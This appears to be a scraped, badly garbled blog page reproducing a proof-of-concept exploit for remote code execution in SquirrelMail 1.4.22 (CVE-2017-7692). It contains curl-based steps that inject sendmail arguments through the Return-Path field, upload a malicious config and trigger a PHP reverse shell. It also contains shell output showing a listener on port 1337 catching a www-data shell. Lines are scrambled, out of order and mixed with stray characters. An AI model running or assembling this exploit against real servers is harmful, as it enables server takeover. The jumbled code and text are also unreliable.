The target server in the context of the web server account which could Ii squirrelmail 2:1.4.23~svn20120406-2ubuntu1.16.04.1 all Webmail for exitĪ successful exploitation could let remote attackers to gain access to Uid=33(www-data) gid=33(www-data) dpkg -l | grep squirrelmail Listening on (family 0, port 1337)Ĭonnection from port 1337 accepted (family 2, sport 60608)īash: cannot set terminal process group (12208): Inappropriate ioctl for device
#Squirrelmail webmail code#
Logging in to SquirrelMail at Uploading Sendmail configĢ - Remote Code Execution (with the uploaded smcnf-exp + phpsh)
SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692) (sleep 2s & curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" -d"subject=poc" -data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &Įcho -e "\n Waiting for shell on $reverse_ip port $reverse_port"Įcho -e "\n The test file should have been written at /tmp/sqpoc"Įcho "There was a problem with sending email" # Send email which triggers the RCE vuln and runs phprevshĮcho -e "\n Sending the email to trigger the vuln" Token="`curl -s -b"SQMSESSID=$sessid key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '' | cut -d'"' -f1 `"Ĭurl -s -b"SQMSESSID=$sessid key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" -data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/nullĮcho "Failed to inject sendmail parameters" System(\"/bin/bash /tmp/cmd rm -f /tmp/cmd\") Įcho -e "\n Injecting Sendmail command parameters" Provide a malicious sendmail config file which can be uploaded as an attachment to Which will result in /tmp/sqpc file created on disk with email log (-X parameterĬauses sendmail to save the debug/maillog into a file).Īs demonstrated by the PoC exploit below, attacker can also inject -Cparameter to The sendmail program will be called with the following arguments: If attacker sets their email address (Return-Path) in the options -oQ/tmp/ -X/tmp/sqpoc Used by attackers to inject additional parameters. Unfortunately it does not take into account \t (TAB) character which can be
Injection of additional parameters to the sendmail command. SquirrelMail allows authenticated users to control envelopefrom (Return-Path) addressĪs we can see it calls str_replace() to sanitize the user input to prevent
$stream = popen(escapeshellcmd($this->sendmail_command), "w") $this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom" save executed command for future reference
0 kommentar(er)
